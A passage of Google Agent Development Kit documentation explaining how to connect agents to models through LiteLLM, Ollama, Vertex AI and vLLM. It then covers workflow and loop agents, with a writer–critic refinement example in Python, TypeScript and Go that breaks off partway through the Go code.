bypass_multi_tools_limit=True to convert google_search to a function tool GoogleSearchTool(bypass_multi_tools_limit=True) ``` In this example, this option converts the built-in google_search to a function calling tool (via GoogleSearchAgentTool), which allows it to work alongside custom function tools. # LiteLLM model connector for ADK agents Supported in ADKPython v0.1.0 [LiteLLM](https://docs.litellm.ai/) is a Python library that acts as a translation layer for models and model hosting services, providing a standardized, OpenAI-compatible interface to over 100+ LLMs. ADK provides integration through the LiteLLM library, allowing you to access a vast range of LLMs from providers like OpenAI, Anthropic (non-Vertex AI), Cohere, and many others. You can run open-source models locally or self-host them and integrate them using LiteLLM for operational control, cost savings, privacy, or offline use cases. You can use the LiteLLM library to access remote or locally hosted AI models: - **Remote model host:** Use the `LiteLlm` wrapper class and set it as the `model` parameter of `LlmAgent`. - **Local model host:** Use the `LiteLlm` wrapper class configured to point to your local model server. For examples of local model hosting solutions, see the [Ollama](/adk-docs/agents/models/ollama/) or [vLLM](/adk-docs/agents/models/vllm/) documentation. Windows Encoding with LiteLLM When using ADK agents with LiteLLM on Windows, you might encounter a `UnicodeDecodeError`. This error occurs because LiteLLM may attempt to read cached files using the default Windows encoding (`cp1252`) instead of UTF-8. Prevent this error by setting the `PYTHONUTF8` environment variable to `1`. This forces Python to use UTF-8 for all file I/O. **Example (PowerShell):** ```powershell # Set for the current session $env:PYTHONUTF8 = "1" # Set persistently for the user [System.Environment]::SetEnvironmentVariable('PYTHONUTF8', '1', [System.EnvironmentVariableTarget]::User) ``` ## Setup 1. **Install LiteLLM:** ```shell pip install litellm ``` 1. **Set Provider API Keys:** Configure API keys as environment variables for the specific providers you intend to use. - *Example for OpenAI:* ```shell export OPENAI_API_KEY="YOUR_OPENAI_API_KEY" ``` - *Example for Anthropic (non-Vertex AI):* ```shell export ANTHROPIC_API_KEY="YOUR_ANTHROPIC_API_KEY" ``` - *Consult the [LiteLLM Providers Documentation](https://docs.litellm.ai/docs/providers) for the correct environment variable names for other providers.* ## Example implementation ```python from google.adk.agents import LlmAgent from google.adk.models.lite_llm import LiteLlm # --- Example Agent using OpenAI's GPT-4o --- # (Requires OPENAI_API_KEY) agent_openai = LlmAgent( model=LiteLlm(model="openai/gpt-4o"), # LiteLLM model string format name="openai_agent", instruction="You are a helpful assistant powered by GPT-4o.", # ... other agent parameters ) # --- Example Agent using Anthropic's Claude Haiku (non-Vertex) --- # (Requires ANTHROPIC_API_KEY) agent_claude_direct = LlmAgent( model=LiteLlm(model="anthropic/claude-3-haiku-20240307"), name="claude_direct_agent", instruction="You are an assistant powered by Claude Haiku.", # ... other agent parameters ) ``` # Ollama model host for ADK agents Supported in ADKPython v0.1.0 [Ollama](https://ollama.com/) is a tool that allows you to host and run open-source models locally. ADK integrates with Ollama-hosted models through the [LiteLLM](/adk-docs/agents/models/litellm/) model connector library. ## Get started Use the LiteLLM wrapper to create agents with Ollama-hosted models. The following code example shows a basic implementation for using Gemma open models with your agents: ```py root_agent = Agent( model=LiteLlm(model="ollama_chat/gemma3:latest"), name="dice_agent", description=( "hello world agent that can roll a dice of 8 sides and check prime" " numbers." ), instruction=""" You roll dice and answer questions about the outcome of the dice rolls. """, tools=[ roll_die, check_prime, ], ) ``` Warning: Use `ollama_chat`interface Make sure you set the provider `ollama_chat` instead of `ollama`. Using `ollama` can result in unexpected behaviors such as infinite tool call loops and ignoring previous context. Use `OLLAMA_API_BASE` environment variable Although you can specify the `api_base` parameter in LiteLLM for generation, as of v1.65.5, the library relies on the environment variable for other API calls. Therefore, you should set the `OLLAMA_API_BASE` environment variable for your Ollama server URL to ensure all requests are routed correctly. ```bash export OLLAMA_API_BASE="http://localhost:11434" adk web ``` ## Model choice If your agent is relying on tools, make sure that you select a model with tool support from [Ollama website](https://ollama.com/search?c=tools). For reliable results, use a model with tool support. You can check tool support for the model using the following command: ```bash ollama show mistral-small3.1 Model architecture mistral3 parameters 24.0B context length 131072 embedding length 5120 quantization Q4_K_M Capabilities completion vision tools ``` You should see **tools** listed under capabilities. You can also look at the template the model is using and tweak it based on your needs. ```bash ollama show --modelfile llama3.2 > model_file_to_modify ``` For instance, the default template for the above model inherently suggests that the model shall call a function all the time. This may result in an infinite loop of function calls. ```text Given the following functions, please respond with a JSON for a function call with its proper arguments that best answers the given prompt. Respond in the format {"name": function name, "parameters": dictionary of argument name and its value}. Do not use variables. ``` You can swap such prompts with a more descriptive one to prevent infinite tool call loops, for instance: ```text Review the user's prompt and the available functions listed below. First, determine if calling one of these functions is the most appropriate way to respond. A function call is likely needed if the prompt asks for a specific action, requires external data lookup, or involves calculations handled by the functions. If the prompt is a general question or can be answered directly, a function call is likely NOT needed. If you determine a function call IS required: Respond ONLY with a JSON object in the format {"name": "function_name", "parameters": {"argument_name": "value"}}. Ensure parameter values are concrete, not variables. If you determine a function call IS NOT required: Respond directly to the user's prompt in plain text, providing the answer or information requested. Do not output any JSON. ``` Then you can create a new model with the following command: ```bash ollama create llama3.2-modified -f model_file_to_modify ``` ## Use OpenAI provider Alternatively, you can use `openai` as the provider name. This approach requires setting the `OPENAI_API_BASE=http://localhost:11434/v1` and `OPENAI_API_KEY=anything` env variables instead of `OLLAMA_API_BASE`. Note that the `API_BASE` value has *`/v1`* at the end. ```py root_agent = Agent( model=LiteLlm(model="openai/mistral-small3.1"), name="dice_agent", description=( "hello world agent that can roll a dice of 8 sides and check prime" " numbers." ), instruction=""" You roll dice and answer questions about the outcome of the dice rolls. """, tools=[ roll_die, check_prime, ], ) ``` ```bash export OPENAI_API_BASE=http://localhost:11434/v1 export OPENAI_API_KEY=anything adk web ``` ### Debugging You can see the request sent to the Ollama server by adding the following in your agent code just after imports. ```py import litellm litellm._turn_on_debug() ``` Look for a line like the following: ```bash Request Sent from LiteLLM: curl -X POST \ http://localhost:11434/api/chat \ -d '{'model': 'mistral-small3.1', 'messages': [{'role': 'system', 'content': ... ``` # Vertex AI hosted models for ADK agents For enterprise-grade scalability, reliability, and integration with Google Cloud's MLOps ecosystem, you can use models deployed to Vertex AI Endpoints. This includes models from Model Garden or your own fine-tuned models. **Integration Method:** Pass the full Vertex AI Endpoint resource string (`projects/PROJECT_ID/locations/LOCATION/endpoints/ENDPOINT_ID`) directly to the `model` parameter of `LlmAgent`. ## Vertex AI Setup Ensure your environment is configured for Vertex AI: 1. **Authentication:** Use Application Default Credentials (ADC): ```shell gcloud auth application-default login ``` 1. **Environment Variables:** Set your project and location: ```shell export GOOGLE_CLOUD_PROJECT="YOUR_PROJECT_ID" export GOOGLE_CLOUD_LOCATION="YOUR_VERTEX_AI_LOCATION" # e.g., us-central1 ``` 1. **Enable Vertex Backend:** Crucially, ensure the `google-genai` library targets Vertex AI: ```shell export GOOGLE_GENAI_USE_VERTEXAI=TRUE ``` ## Model Garden Deployments Supported in ADKPython v0.2.0 You can deploy various open and proprietary models from the [Vertex AI Model Garden](https://console.cloud.google.com/vertex-ai/model-garden) to an endpoint. **Example:** ```python from google.adk.agents import LlmAgent from google.genai import types # For config objects # --- Example Agent using a Llama 3 model deployed from Model Garden --- # Replace with your actual Vertex AI Endpoint resource name llama3_endpoint = "projects/YOUR_PROJECT_ID/locations/us-central1/endpoints/YOUR_LLAMA3_ENDPOINT_ID" agent_llama3_vertex = LlmAgent( model=llama3_endpoint, name="llama3_vertex_agent", instruction="You are a helpful assistant based on Llama 3, hosted on Vertex AI.", generate_content_config=types.GenerateContentConfig(max_output_tokens=2048), # ... other agent parameters ) ``` ## Fine-tuned Model Endpoints Supported in ADKPython v0.2.0 Deploying your fine-tuned models (whether based on Gemini or other architectures supported by Vertex AI) results in an endpoint that can be used directly. **Example:** ```python from google.adk.agents import LlmAgent # --- Example Agent using a fine-tuned Gemini model endpoint --- # Replace with your fine-tuned model's endpoint resource name finetuned_gemini_endpoint = "projects/YOUR_PROJECT_ID/locations/us-central1/endpoints/YOUR_FINETUNED_ENDPOINT_ID" agent_finetuned_gemini = LlmAgent( model=finetuned_gemini_endpoint, name="finetuned_gemini_agent", instruction="You are a specialized assistant trained on specific data.", # ... other agent parameters ) ``` ## Anthropic Claude on Vertex AI Supported in ADKPython v0.2.0Java v0.1.0 Some providers, like Anthropic, make their models available directly through Vertex AI. **Integration Method:** Uses the direct model string (e.g., `"claude-3-sonnet@20240229"`), *but requires manual registration* within ADK. **Why Registration?** ADK's registry automatically recognizes `gemini-*` strings and standard Vertex AI endpoint strings (`projects/.../endpoints/...`) and routes them via the `google-genai` library. For other model types used directly via Vertex AI (like Claude), you must explicitly tell the ADK registry which specific wrapper class (`Claude` in this case) knows how to handle that model identifier string with the Vertex AI backend. **Setup:** 1. **Vertex AI Environment:** Ensure the consolidated Vertex AI setup (ADC, Env Vars, `GOOGLE_GENAI_USE_VERTEXAI=TRUE`) is complete. 1. **Install Provider Library:** Install the necessary client library configured for Vertex AI. ```shell pip install "anthropic[vertex]" ``` 1. **Register Model Class:** Add this code near the start of your application, *before* creating an agent using the Claude model string: ```python # Required for using Claude model strings directly via Vertex AI with LlmAgent from google.adk.models.anthropic_llm import Claude from google.adk.models.registry import LLMRegistry LLMRegistry.register(Claude) ``` **Example:** ```python from google.adk.agents import LlmAgent from google.adk.models.anthropic_llm import Claude # Import needed for registration from google.adk.models.registry import LLMRegistry # Import needed for registration from google.genai import types # --- Register Claude class (do this once at startup) --- LLMRegistry.register(Claude) # --- Example Agent using Claude 3 Sonnet on Vertex AI --- # Standard model name for Claude 3 Sonnet on Vertex AI claude_model_vertexai = "claude-3-sonnet@20240229" agent_claude_vertexai = LlmAgent( model=claude_model_vertexai, # Pass the direct string after registration name="claude_vertexai_agent", instruction="You are an assistant powered by Claude 3 Sonnet on Vertex AI.", generate_content_config=types.GenerateContentConfig(max_output_tokens=4096), # ... other agent parameters ) ``` **Integration Method:** Directly instantiate the provider-specific model class (e.g., `com.google.adk.models.Claude`) and configure it with a Vertex AI backend. **Why Direct Instantiation?** The Java ADK's `LlmRegistry` primarily handles Gemini models by default. For third-party models like Claude on Vertex AI, you directly provide an instance of the ADK's wrapper class (e.g., `Claude`) to the `LlmAgent`. This wrapper class is responsible for interacting with the model via its specific client library, configured for Vertex AI. **Setup:** 1. **Vertex AI Environment:** - Ensure your Google Cloud project and region are correctly set up. - **Application Default Credentials (ADC):** Make sure ADC is configured correctly in your environment. This is typically done by running `gcloud auth application-default login`. The Java client libraries use these credentials to authenticate with Vertex AI. Follow the [Google Cloud Java documentation on ADC](https://cloud.google.com/java/docs/reference/google-auth-library/latest/com.google.auth.oauth2.GoogleCredentials#com_google_auth_oauth2_GoogleCredentials_getApplicationDefault__) for detailed setup. 1. **Provider Library Dependencies:** - **Third-Party Client Libraries (Often Transitive):** The ADK core library often includes the necessary client libraries for common third-party models on Vertex AI (like Anthropic's required classes) as **transitive dependencies**. This means you might not need to explicitly add a separate dependency for the Anthropic Vertex SDK in your `pom.xml` or `build.gradle`. 1. **Instantiate and Configure the Model:** When creating your `LlmAgent`, instantiate the `Claude` class (or the equivalent for another provider) and configure its `VertexBackend`. **Example:** ```java import com.anthropic.client.AnthropicClient; import com.anthropic.client.okhttp.AnthropicOkHttpClient; import com.anthropic.vertex.backends.VertexBackend; import com.google.adk.agents.LlmAgent; import com.google.adk.models.Claude; // ADK's wrapper for Claude import com.google.auth.oauth2.GoogleCredentials; import java.io.IOException; // ... other imports public class ClaudeVertexAiAgent { public static LlmAgent createAgent() throws IOException { // Model name for Claude 3 Sonnet on Vertex AI (or other versions) String claudeModelVertexAi = "claude-3-7-sonnet"; // Or any other Claude model // Configure the AnthropicOkHttpClient with the VertexBackend AnthropicClient anthropicClient = AnthropicOkHttpClient.builder() .backend( VertexBackend.builder() .region("us-east5") // Specify your Vertex AI region .project("your-gcp-project-id") // Specify your GCP Project ID .googleCredentials(GoogleCredentials.getApplicationDefault()) .build()) .build(); // Instantiate LlmAgent with the ADK Claude wrapper LlmAgent agentClaudeVertexAi = LlmAgent.builder() .model(new Claude(claudeModelVertexAi, anthropicClient)) // Pass the Claude instance .name("claude_vertexai_agent") .instruction("You are an assistant powered by Claude 3 Sonnet on Vertex AI.") // .generateContentConfig(...) // Optional: Add generation config if needed // ... other agent parameters .build(); return agentClaudeVertexAi; } public static void main(String[] args) { try { LlmAgent agent = createAgent(); System.out.println("Successfully created agent: " + agent.name()); // Here you would typically set up a Runner and Session to interact with the agent } catch (IOException e) { System.err.println("Failed to create agent: " + e.getMessage()); e.printStackTrace(); } } } ``` ## Open Models on Vertex AI Supported in ADKPython v0.1.0 Vertex AI offers a curated selection of open-source models, such as Meta Llama, through Model-as-a-Service (MaaS). These models are accessible via managed APIs, allowing you to deploy and scale without managing the underlying infrastructure. For a full list of available options, see the [Vertex AI open models for MaaS](https://docs.cloud.google.com/vertex-ai/generative-ai/docs/maas/use-open-models#open-models) documentation. You can use the [LiteLLM](https://docs.litellm.ai/) library to access open models like Meta's Llama on VertexAI MaaS **Integration Method:** Use the `LiteLlm` wrapper class and set it as the `model` parameter of `LlmAgent`. Make sure you go through the [LiteLLM model connector for ADK agents](/adk-docs/agents/models/litellm/#litellm-model-connector-for-adk-agents) documentation on how to use LiteLLM in ADK **Setup:** 1. **Vertex AI Environment:** Ensure the consolidated Vertex AI setup (ADC, Env Vars, `GOOGLE_GENAI_USE_VERTEXAI=TRUE`) is complete. 1. **Install LiteLLM:** ```shell pip install litellm ``` **Example:** ```python from google.adk.agents import LlmAgent from google.adk.models.lite_llm import LiteLlm # --- Example Agent using Meta's Llama 4 Scout --- agent_llama_vertexai = LlmAgent( model=LiteLlm(model="vertex_ai/meta/llama-4-scout-17b-16e-instruct-maas"), # LiteLLM model string format name="llama4_agent", instruction="You are a helpful assistant powered by Llama 4 Scout.", # ... other agent parameters ) ``` # vLLM model host for ADK agents Supported in ADKPython v0.1.0 Tools such as [vLLM](https://github.com/vllm-project/vllm) allow you to host models efficiently and serve them as an OpenAI-compatible API endpoint. You can use vLLM models through the [LiteLLM](/adk-docs/agents/models/litellm/) library for Python. ## Setup 1. **Deploy Model:** Deploy your chosen model using vLLM (or a similar tool). Note the API base URL (e.g., `https://your-vllm-endpoint.run.app/v1`). - *Important for ADK Tools:* When deploying, ensure the serving tool supports and enables OpenAI-compatible tool/function calling. For vLLM, this might involve flags like `--enable-auto-tool-choice` and potentially a specific `--tool-call-parser`, depending on the model. Refer to the vLLM documentation on Tool Use. 1. **Authentication:** Determine how your endpoint handles authentication (e.g., API key, bearer token). ## Integration Example The following example shows how to use a vLLM endpoint with ADK agents. ```python import subprocess from google.adk.agents import LlmAgent from google.adk.models.lite_llm import LiteLlm # --- Example Agent using a model hosted on a vLLM endpoint --- # Endpoint URL provided by your vLLM deployment api_base_url = "https://your-vllm-endpoint.run.app/v1" # Model name as recognized by *your* vLLM endpoint configuration model_name_at_endpoint = "hosted_vllm/google/gemma-3-4b-it" # Example from vllm_test.py # Authentication (Example: using gcloud identity token for a Cloud Run deployment) # Adapt this based on your endpoint's security try: gcloud_token = subprocess.check_output( ["gcloud", "auth", "print-identity-token", "-q"] ).decode().strip() auth_headers = {"Authorization": f"Bearer {gcloud_token}"} except Exception as e: print(f"Warning: Could not get gcloud token - {e}. Endpoint might be unsecured or require different auth.") auth_headers = None # Or handle error appropriately agent_vllm = LlmAgent( model=LiteLlm( model=model_name_at_endpoint, api_base=api_base_url, # Pass authentication headers if needed extra_headers=auth_headers # Alternatively, if endpoint uses an API key: # api_key="YOUR_ENDPOINT_API_KEY" ), name="vllm_agent", instruction="You are a helpful assistant running on a self-hosted vLLM endpoint.", # ... other agent parameters ) ``` # Workflow Agents Supported in ADKPythonTypeScriptGoJava This section introduces "*workflow agents*" - **specialized agents that control the execution flow of its sub-agents**. Workflow agents are specialized components in ADK designed purely for **orchestrating the execution flow of sub-agents**. Their primary role is to manage *how* and *when* other agents run, defining the control flow of a process. Unlike [LLM Agents](https://google.github.io/adk-docs/agents/llm-agents/index.md), which use Large Language Models for dynamic reasoning and decision-making, Workflow Agents operate based on **predefined logic**. They determine the execution sequence according to their type (e.g., sequential, parallel, loop) without consulting an LLM for the orchestration itself. This results in **deterministic and predictable execution patterns**. ADK provides three core workflow agent types, each implementing a distinct execution pattern: - **Sequential Agents** ______________________________________________________________________ Executes sub-agents one after another, in **sequence**. [Learn more](https://google.github.io/adk-docs/agents/workflow-agents/sequential-agents/index.md) - **Loop Agents** ______________________________________________________________________ **Repeatedly** executes its sub-agents until a specific termination condition is met. [Learn more](https://google.github.io/adk-docs/agents/workflow-agents/loop-agents/index.md) - **Parallel Agents** ______________________________________________________________________ Executes multiple sub-agents in **parallel**. [Learn more](https://google.github.io/adk-docs/agents/workflow-agents/parallel-agents/index.md) ## Why Use Workflow Agents? Workflow agents are essential when you need explicit control over how a series of tasks or agents are executed. They provide: - **Predictability:** The flow of execution is guaranteed based on the agent type and configuration. - **Reliability:** Ensures tasks run in the required order or pattern consistently. - **Structure:** Allows you to build complex processes by composing agents within clear control structures. While the workflow agent manages the control flow deterministically, the sub-agents it orchestrates can themselves be any type of agent, including intelligent LLM Agent instances. This allows you to combine structured process control with flexible, LLM-powered task execution. # Loop agents Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.2.0 The `LoopAgent` is a workflow agent that executes its sub-agents in a loop (i.e. iteratively). It ***repeatedly runs* a sequence of agents** for a specified number of iterations or until a termination condition is met. Use the `LoopAgent` when your workflow involves repetition or iterative refinement, such as revising code. ### Example - You want to build an agent that can generate images of food, but sometimes when you want to generate a specific number of items (e.g. 5 bananas), it generates a different number of those items in the image, such as an image of 7 bananas. You have two tools: `Generate Image`, `Count Food Items`. Because you want to keep generating images until it either correctly generates the specified number of items, or after a certain number of iterations, you should build your agent using a `LoopAgent`. As with other [workflow agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md), the `LoopAgent` is not powered by an LLM, and is thus deterministic in how it executes. That being said, workflow agents are only concerned with their execution, such as in a loop, and not their internal logic; the tools or sub-agents of a workflow agent may or may not utilize LLMs. ### How it Works When the `LoopAgent`'s `Run Async` method is called, it performs the following actions: 1. **Sub-Agent Execution:** It iterates through the Sub Agents list *in order*. For *each* sub-agent, it calls the agent's `Run Async` method. 1. **Termination Check:** *Crucially*, the `LoopAgent` itself does *not* inherently decide when to stop looping. You *must* implement a termination mechanism to prevent infinite loops. Common strategies include: - **Max Iterations**: Set a maximum number of iterations in the `LoopAgent`. **The loop will terminate after that many iterations**. - **Escalation from sub-agent**: Design one or more sub-agents to evaluate a condition (e.g., "Is the document quality good enough?", "Has a consensus been reached?"). If the condition is met, the sub-agent can signal termination (e.g., by raising a custom event, setting a flag in a shared context, or returning a specific value). ### Full Example: Iterative Document Improvement Imagine a scenario where you want to iteratively improve a document: - **Writer Agent:** An `LlmAgent` that generates or refines a draft on a topic. - **Critic Agent:** An `LlmAgent` that critiques the draft, identifying areas for improvement. ```py LoopAgent(sub_agents=[WriterAgent, CriticAgent], max_iterations=5) ``` In this setup, the `LoopAgent` would manage the iterative process. The `CriticAgent` could be **designed to return a "STOP" signal when the document reaches a satisfactory quality level**, preventing further iterations. Alternatively, the `max iterations` parameter could be used to limit the process to a fixed number of cycles, or external logic could be implemented to make stop decisions. The **loop would run at most five times**, ensuring the iterative refinement doesn't continue indefinitely. Full Code ````py from google.adk.agents import LoopAgent, LlmAgent, SequentialAgent from google.adk.tools.tool_context import ToolContext from google.adk.agents.callback_context import CallbackContext # --- Constants --- GEMINI_MODEL = "gemini-2.5-flash" # --- State Keys --- STATE_CURRENT_DOC = "current_document" STATE_CRITICISM = "criticism" # Define the exact phrase the Critic should use to signal completion COMPLETION_PHRASE = "No major issues found." # --- Tool Definition --- def exit_loop(tool_context: ToolContext): """Call this function ONLY when the critique indicates no further changes are needed, signaling the iterative process should end.""" print(f" [Tool Call] exit_loop triggered by {tool_context.agent_name}") tool_context.actions.escalate = True tool_context.actions.skip_summarization = True # Return empty dict as tools should typically return JSON-serializable output return {} # --- Before Agent Callback --- def update_initial_topic_state(callback_context: CallbackContext): """Ensure 'initial_topic' is set in state before pipeline starts.""" callback_context.state['initial_topic'] = callback_context.state.get('initial_topic', 'a robot developing unexpected emotions') # --- Agent Definitions --- # STEP 1: Initial Writer Agent (Runs ONCE at the beginning) initial_writer_agent = LlmAgent( name="InitialWriterAgent", model=GEMINI_MODEL, include_contents='none', instruction=f""" You are a Creative Writing Assistant tasked with starting a story. Write a *very basic* first draft of a short story (just 1-2 simple sentences). Keep it plain and minimal - do NOT add descriptive language yet. Topic: {{initial_topic}} Output *only* the story/document text. Do not add introductions or explanations. """, description="Writes the initial document draft based on the topic, aiming for some initial substance.", output_key=STATE_CURRENT_DOC ) # STEP 2a: Critic Agent (Inside the Refinement Loop) critic_agent_in_loop = LlmAgent( name="CriticAgent", model=GEMINI_MODEL, include_contents='none', instruction=f""" You are a Constructive Critic AI reviewing a short story draft. **Document to Review:** ``` {{current_document}} ``` **Completion Criteria (ALL must be met):** 1. At least 4 sentences long 2. Has a clear beginning, middle, and end 3. Includes at least one descriptive detail (sensory or emotional) **Task:** Check the document against the criteria above. IF any criteria is NOT met, provide specific feedback on what to add or improve. Output *only* the critique text. IF ALL criteria are met, respond *exactly* with: "{COMPLETION_PHRASE}" """, description="Reviews the current draft, providing critique if clear improvements are needed, otherwise signals completion.", output_key=STATE_CRITICISM ) # STEP 2b: Refiner/Exiter Agent (Inside the Refinement Loop) refiner_agent_in_loop = LlmAgent( name="RefinerAgent", model=GEMINI_MODEL, # Relies solely on state via placeholders include_contents='none', instruction=f""" You are a Creative Writing Assistant refining a document based on feedback OR exiting the process. **Current Document:** ``` {{current_document}} ``` **Critique/Suggestions:** {{criticism}} **Task:** Analyze the 'Critique/Suggestions'. IF the critique is *exactly* "{COMPLETION_PHRASE}": You MUST call the 'exit_loop' function. Do not output any text. ELSE (the critique contains actionable feedback): Carefully apply the suggestions to improve the 'Current Document'. Output *only* the refined document text. Do not add explanations. Either output the refined document OR call the exit_loop function. """, description="Refines the document based on critique, or calls exit_loop if critique indicates completion.", tools=[exit_loop], # Provide the exit_loop tool output_key=STATE_CURRENT_DOC # Overwrites state['current_document'] with the refined version ) # STEP 2: Refinement Loop Agent refinement_loop = LoopAgent( name="RefinementLoop", # Agent order is crucial: Critique first, then Refine/Exit sub_agents=[ critic_agent_in_loop, refiner_agent_in_loop, ], max_iterations=5 # Limit loops ) # STEP 3: Overall Sequential Pipeline # For ADK tools compatibility, the root agent must be named `root_agent` root_agent = SequentialAgent( name="IterativeWritingPipeline", sub_agents=[ initial_writer_agent, # Run first to create initial doc refinement_loop # Then run the critique/refine loop ], before_agent_callback=update_initial_topic_state, # set initial topic in state description="Writes an initial document and then iteratively refines it with critique using an exit tool." ) ```` ```typescript // Part of agent.ts --> Follow https://google.github.io/adk-docs/get-started/quickstart/ to learn the setup import { LoopAgent, LlmAgent, SequentialAgent, FunctionTool } from '@google/adk'; import { z } from 'zod'; // --- Constants --- const GEMINI_MODEL = "gemini-2.5-flash"; const STATE_INITIAL_TOPIC = "initial_topic"; // --- State Keys --- const STATE_CURRENT_DOC = "current_document"; const STATE_CRITICISM = "criticism"; // Define the exact phrase the Critic should use to signal completion const COMPLETION_PHRASE = "No major issues found."; // --- Tool Definition --- const exitLoopTool = new FunctionTool({ name: 'exit_loop', description: 'Call this function ONLY when the critique indicates no further changes are needed, signaling the iterative process should end.', parameters: z.object({}), execute: (input, toolContext) => { if (toolContext) { console.log(` [Tool Call] exit_loop triggered by ${toolContext.agentName} with input: ${input}`); toolContext.actions.escalate = true; } return {}; }, }); // --- Agent Definitions --- // STEP 1: Initial Writer Agent (Runs ONCE at the beginning) const initialWriterAgent = new LlmAgent({ name: "InitialWriterAgent", model: GEMINI_MODEL, includeContents: 'none', // MODIFIED Instruction: Ask for a slightly more developed start instruction: `You are a Creative Writing Assistant tasked with starting a story. Write the *first draft* of a short story (aim for 2-4 sentences). Base the content *only* on the topic provided below. Try to introduce a specific element (like a character, a setting detail, or a starting action) to make it engaging. Topic: {{${STATE_INITIAL_TOPIC}}} Output *only* the story/document text. Do not add introductions or explanations. `, description: "Writes the initial document draft based on the topic, aiming for some initial substance.", outputKey: STATE_CURRENT_DOC }); // STEP 2a: Critic Agent (Inside the Refinement Loop) const criticAgentInLoop = new LlmAgent({ name: "CriticAgent", model: GEMINI_MODEL, includeContents: 'none', // MODIFIED Instruction: More nuanced completion criteria, look for clear improvement paths. instruction: `You are a Constructive Critic AI reviewing a short document draft (typically 2-6 sentences). Your goal is balanced feedback. **Document to Review:** {{current_document}} **Task:** Review the document for clarity, engagement, and basic coherence according to the initial topic (if known). IF you identify 1-2 *clear and actionable* ways the document could be improved to better capture the topic or enhance reader engagement (e.g., "Needs a stronger opening sentence", "Clarify the character's goal"): Provide these specific suggestions concisely. Output *only* the critique text. ELSE IF the document is coherent, addresses the topic adequately for its length, and has no glaring errors or obvious omissions: Respond *exactly* with the phrase "${COMPLETION_PHRASE}" and nothing else. It doesn't need to be perfect, just functionally complete for this stage. Avoid suggesting purely subjective stylistic preferences if the core is sound. Do not add explanations. Output only the critique OR the exact completion. `, description: "Reviews the current draft, providing critique if clear improvements are needed, otherwise signals completion.", outputKey: STATE_CRITICISM }); // STEP 2b: Refiner/Exiter Agent (Inside the Refinement Loop) const refinerAgentInLoop = new LlmAgent({ name: "RefinerAgent", model: GEMINI_MODEL, // Relies solely on state via placeholders includeContents: 'none', instruction: `You are a Creative Writing Assistant refining a document based on feedback OR exiting the process. **Current Document:** {{current_document}} **Critique/Suggestions:** {{criticism}} **Task:** Analyze the 'Critique/Suggestions'. IF the critique is *exactly* "${COMPLETION_PHRASE}": You MUST call the 'exit_loop' function. Do not output any text. ELSE (the critique contains actionable feedback): Carefully apply the suggestions to improve the 'Current Document'. Output *only* the refined document text. Do not add explanations. Either output the refined document OR call the exit_loop function. `, tools: [exitLoopTool], description: "Refines the document based on critique, or calls exit_loop if critique indicates completion.", outputKey: STATE_CURRENT_DOC }); // STEP 2: Refinement Loop Agent const refinementLoop = new LoopAgent({ name: "RefinementLoop", // Agent order is crucial: Critique first, then Refine/Exit subAgents: [ criticAgentInLoop, refinerAgentInLoop, ], maxIterations: 5 // Limit loops }); // STEP 3: Overall Sequential Pipeline // For ADK tools compatibility, the root agent must be named `root_agent` export const rootAgent = new SequentialAgent({ name: "IterativeWritingPipeline", subAgents: [ initialWriterAgent, // Run first to create initial doc refinementLoop // Then run the critique/refine loop ], description: "Writes an initial document and then iteratively refines it with critique using an exit tool." }); ``` ```go // ExitLoopArgs defines the (empty) arguments for the ExitLoop tool. type ExitLoopArgs struct{} // ExitLoopResults defines the output of the ExitLoop tool. type ExitLoopResults struct{} // ExitLoop is a tool that signals the loop to terminate by setting Escalate to true. func ExitLoop(ctx tool.Context, input ExitLoopArgs) (ExitLoopResults, error) { fmt.Printf("[Tool Call] exitLoop triggered by %s \n", ctx.AgentName()) ctx.Actions().Escalate = true return ExitLoopResults{}, nil } func main() { ctx := context.Background() if err := runAgent(ctx, "Write a document about a cat"); err != nil { log.Fatalf("Agent execution failed: %v", err) } } func runAgent(ctx context.Context, prompt string) error { model, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { return fmt.Errorf("failed to create model: %v", err) } // STEP 1: Initial Writer Agent (Runs ONCE at the beginning) initialWriterAgent, err := llmagent.New(llmagent.Config{ Name: "InitialWriterAgent", Model: model, Description: "Writes the initial document draft based on the topic.", Instruction: `You are a Creative Writing Assistant tasked with starting a story. Write the *first draft* of a short story (aim for 2-4 sentences). Base the content *only* on the topic provided in the user's prompt. Output *only* the story/document text. Do not add introductions or explanations.`, OutputKey: stateDoc, }) if err != nil { return fmt.Errorf("failed to create initial writer agent: %v", err) } // STEP 2a: Critic Agent (Inside the Refinement Loop) criticAgentInLoop, err := llmagent.New(llmagent.Config{ Name: "CriticAgent", Model: model, Description: "Reviews the current draft, providing critique or signaling completion.", Instruction: fmt.Sprintf(`You are a Constructive Critic AI reviewing a short document draft. **Document to Review:** """ {%s} """ **Task:** Review the document. IF you identify 1-2 *clear and actionable* ways it could be improved: Provide these specific suggestions concisely. Output *only* the critique text. ELSE IF the document is coherent and addresses the topic adequately: Respond *exactly* with the phrase "%s" and nothing else.`, stateDoc, donePhrase), OutputKey: stateCrit, }) if err != nil { return fmt.Errorf("failed to create critic agent: %v", err) } exitLoopTool, err := functiontool.New( functiontool.Config{ Name: "exitLoop", Description: "Call this function ONLY when the critique indicates no further changes are needed.", }, ExitLoop, ) if err != nil { return fmt.Errorf("failed to create exit loop tool: %v", err) } // STEP 2b: Refiner/Exiter Agent (Inside the Refinement Loop) refinerAgentInLoop, err := llmagent.New(llmagent.Config{ Name: "RefinerAgent", Model: model, Instruction: fmt.Sprintf(`You are a Creative Writing Assistant refining a document based on feedback OR exiting the process. **Current Document:** """ {%s} """ **Critique/Suggestions:** {%s} **Task:** Analyze the 'Critique/Suggestions'. IF the critique is *exactly* "%s": You MUST call the 'exitLoop' function. Do not output any text. ELSE (the critique contains actionable feedback): Carefully apply the suggestions to improve the 'Current Document'. Output *only* the refined document text.`, stateDoc, stateCrit, donePhrase), Description: "Refines the document based on critique, or calls exitLoop if critique indicates completion.", Tools: []tool.Tool{exitLoopTool}, OutputKey: stateDoc, }) if err != nil { return fmt.Errorf("failed to create refiner agent: %v", err) } // STEP 2: Refinement Loop Agent refinementLoop, err := loopagent.New(loopagent.Config{ AgentConfig: agent.Config{ Name: "RefinementLoop", SubAgents: []agent.Agent{criticAgentInLoop, refinerAgentInLoop}, }, MaxIterations: 5, }) if err != nil { return fmt.Errorf("failed to create loop agent: %v", err) } // STEP 3: Overall Sequential Pipeline iterativeWriterAgent, err := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{ Name: appName, SubAgents: []agent.Agent{initialWriterAgent, 